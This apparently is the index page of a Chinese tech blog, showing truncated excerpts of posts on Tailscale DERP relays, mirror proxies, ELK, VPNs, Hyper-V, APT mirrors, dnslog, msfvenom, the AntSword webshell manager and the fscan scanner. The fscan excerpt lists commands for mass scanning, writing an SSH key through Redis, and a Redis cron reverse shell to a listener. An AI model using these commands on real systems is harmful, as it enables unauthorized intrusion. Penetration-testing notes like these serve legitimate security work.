tailscale是一款基于Wireguard的开源组网软件，可以通过服务器实现中继或打洞 打洞成功后可以直接走P2P，避免浪费服务器带宽 但是在某些情况下，使用官方服务器打洞成功率较低，而且在恶劣网络情况下，官方服务器的中继效果较差，所以我自己部署了多个derp，以实现高可用的打洞和中继服务。 官方对DerpServer的介绍 如何自定义自己的Derp 但是在这里我使用docker方便快速部署，因为机器有点多，懒得一个去装XD Derp部署 version: '3.7' services: derper: image: fredliang/derper ports: - "60080:80" - "60443:443" - "3478:34…

最近在写项目，发现我要下载的东西怎么啥都被GFW了（github源码和发布文件/docker镜像/go工具链等） 镜像源没有，加速站没有，仅存几个可用的被边写边封，后来决定自己写了个反向代理的镜像站供工程使用 正文有提供给读者测试的一个小站，也可以用作小型生产环境，我自己已经完全依赖自己的镜像源了，尽可能维持稳定吧，要是炸了我服务SLA也炸了 ...

关于ELK以及其优势 简单GPT一下 ELK 是 Elasticsearch、Logstash 和 Kibana 三个开源项目的首字母缩写，通常一起使用构成一个强大的日志管理和分析解决方案。下面将介绍它们各自的功能和ELK的优势： - Elasticsearch: 是一个基于 Lucene 构建的高性能搜索引擎。 主要用于全文搜索和分析。 具有高伸缩性，可以水平扩展，并且能够快速处理大量数据。 - Logstash: 是一个强大的数据处理管道工具。 能够动态地收集、处理和转发日志和事件数据。 支持多种输入、过滤、编解码和输出插件。 - Kibana: 是一个为 Elasticsearch 提供数据可视化的 Web 应用程序。 允许用户创建和分…

首先我们要搞清楚一个问题，Wireguard和OpenVPN的区别在哪里 Wireguard基于UDP协议，继承于内核中，由于加密协议简单（但安全），开销较小，性能较高 OpenVPN基于TCP或UDP协议，由SSL/TLS实现身份加密，没有Wireguard效率高，但是支持多种管理方式 在实际使用上，TCP和UDP也有较大区别 TCP：可以提供更可靠的连接，因为它具有确认和重传机制，能够处理丢包和错误。适用于对数据完整性和可靠性要求较高的场景。 UDP：UDP可以提供更快的速度和较低的延迟，适用于实时应用程序和视频流等对延迟敏感的情况。UDP模式还可以避免TCP拥塞控制的限制，适用于高带宽环境 UDP在实际使用上可能会被QOS限速，但是在长…

Hyper-V Hyper-V，代号Viridian，旧称Windows Server Virtualization，是Microsoft的本地虚拟机管理程序，它可以在运行x86-64位的Windows上创建虚拟机。从Windows 8开始，Hyper-V取代Windows Virtual PC作为Windows客户端版本的硬件虚拟化组件。可以配置运行Hyper-V的服务器计算机能够将单个虚拟机公开到一个或多个网络。Hyper-V是与Windows Server 2008一起首次发布，自Windows Server 2012和Windows 8以来一直无需额外付费。独立的Windows Hyper-V Server是免费的，但仅具有命令行接口…

引言 最近在折腾自己学校的镜像源，看到差不多20T的硬盘都被塞满了，我是很好奇系统是如何管理这些文件的，于是顺便就研究下APT源的工作原理 原理 在Ubuntu/Debian等系统下，常见的应用安装方式为apt/apt-get 前者可以说是后者的升级版，提供了更友好的命令行界面，包含了apt-get和apt-cache等常用功能，本质上都是基于dpkg的高级包管理工具。 Ubuntu/Debian采用集中式的软件仓库机制，将各式各样的软件包分门别类地存放在软件仓库中，进行有效地组织和管理。由于网络环境的问题，我们可能无法正常访问官方的软件仓库，所以许多镜像服务器被建立，并且时刻保持与官方服务器的同步。在使用apt之前，我们一般都会进行换源处理…

Dnslog相信渗透的都不陌生，但我只是在Apache Log4j后才意识到这东西是有多好用 但是有些时候，知名的dnslog.cn网站就会崩溃。 既然这样，干脆就自己搭一个，但是过程十分艰辛。 由于我设置了@*解析，我就不需要再对ns1.xxx.cn/ns2.xxx.cn进行解析 具体如下 然后我们就接着物色dnslog平台 一个非常古老的BugScanTeam的DNSLOG 于是乎，调了好久，6年前的代码，还要改cdn，还要改ssl（开发组历史遗留问题） 最后改完了，发现一直301，查看issue才发现要修改 SECURE_SSL_REDIRECT = False 然而，无论怎么修改数据库，还是进不去他的管理界面！ 之后只好另谋出路，最后…

Metasploit一款开源安全漏洞检测工具，其不断更新的Payload使其成为了最强大的渗透框架之一 对于MSFCONSOLE（简称MSF），就不多赘述安装部署了，对于日常渗透使用一般可以再Viper中使用。 常见参数解读： -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < form…

Github仓库 蚁剑官方加载器 这是一款Webshell管理的基础软件，渗透的一切都是围绕shell进行的，内置的插件也能解决一些小问题 附一张成功webshell的截图 连接密码对应webshell的POST参数

Github仓库 Fscan是一款内网综合扫描工具，以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan -h 19…